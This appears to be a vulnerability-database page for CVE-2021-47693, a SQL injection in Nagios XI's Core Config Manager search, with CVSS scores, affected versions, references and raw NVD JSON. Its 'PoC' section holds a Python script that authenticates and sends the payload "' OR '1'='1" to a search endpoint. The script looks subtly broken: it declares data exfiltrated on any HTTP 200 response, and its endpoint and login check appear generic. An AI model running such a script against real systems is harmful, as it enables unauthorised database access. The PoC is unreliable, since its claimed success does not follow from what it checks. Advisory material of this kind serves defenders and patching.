Security Vulnerability Report
CVE-2021-47693 CVSS 8.8 HIGH

CVE-2021-47693

Published: 2025-10-30 22:15:41
Last Modified: 2025-11-06 18:19:58

Description

The Core Config Manager (CCM) in Nagios XI versions prior to CCM 3.1.3 / Nagios XI 5.8.5 contains a SQL injection vulnerability in the search text handling. Unsanitized user-supplied input was incorporated into SQL queries used by configuration object editors, allowing authenticated users to inject SQL fragments. Successful exploitation could lead to unauthorized disclosure or modification of configuration and application data, and in some environments could allow further compromise of the application or backend database.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* - VULNERABLE
Nagios XI CCM < 3.1.3
Nagios XI < 5.8.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2021-47693 - Nagios XI CCM SQL Injection PoC
# Requires valid low-privilege credentials
import requests
import sys
from urllib.parse import urlencode

target = "http://target-nagios-xi.local/nagiosxi/"
username = "lowpriv_user"
password = "password123"

session = requests.Session()

# Step 1: Authenticate
login_url = target + "login.php"
login_data = {
    "username": username,
    "password": password
}
resp = session.post(login_url, data=login_data, verify=False)
if "nagiosxi" not in resp.url.lower():
    print("[-] Authentication failed")
    sys.exit(1)
print("[+] Authentication successful")

# Step 2: Exploit SQL Injection in CCM search
ccm_url = target + "api/v1/objects/config/search"
sqli_payload = "' OR '1'='1"
params = {"search_text": sqli_payload}
print(f"[*] Sending SQLi payload: {sqli_payload}")
resp = session.get(ccm_url, params=params, verify=False)
if resp.status_code == 200:
    print("[+] SQL Injection successful - Data exfiltrated")
    print(resp.text)
else:
    print(f"[-] Exploitation failed with status: {resp.status_code}")
```

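References

https://www.nagios.com/changelog/nagios-xi/ (Release Notes)
https://www.vulncheck.com/advisories/nagios-xi-ccm-sqli-via-improper-escaping-in-search-text (Third Party Advisory)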

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47693", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:40.673", "lastModified": "2025-11-06T18:19:57.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Core Config Manager (CCM) in Nagios XI versions prior to CCM 3.1.3 / Nagios XI 5.8.5 contains a SQL injection vulnerability in the search text handling. Unsanitized user-supplied input was incorporated into SQL queries used by configuration object editors, allowing authenticated users to inject SQL fragments. Successful exploitation could lead to unauthorized disclosure or modification of configuration and application data, and in some environments could allow further compromise of the application or backend database."}, {"lang": "es", "value": "El Core Config Manager (CCM) en versiones de Nagios XI anteriores a CCM 3.1.3 / Nagios XI 5.8.5 contiene una vulnerabilidad de inyección SQL en el manejo del texto de búsqueda. Entrada de usuario no sanitizada se incorporó en consultas SQL utilizadas por los editores de objetos de configuración, permitiendo a usuarios autenticados inyectar fragmentos SQL. 
La explotación exitosa podría llevar a la divulgación o modificación no autorizada de datos de configuración y de la aplicación, y en algunos entornos podría permitir un mayor compromiso de la aplicación o de la base de datos backend."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", 
"attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.8.5", "matchCriteriaId": "16C2735A-6289-4DA5-B50A-E98B837C8B9B"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-xi/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/nagios-xi-ccm-sqli-via-improper-escaping-in-search-text", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}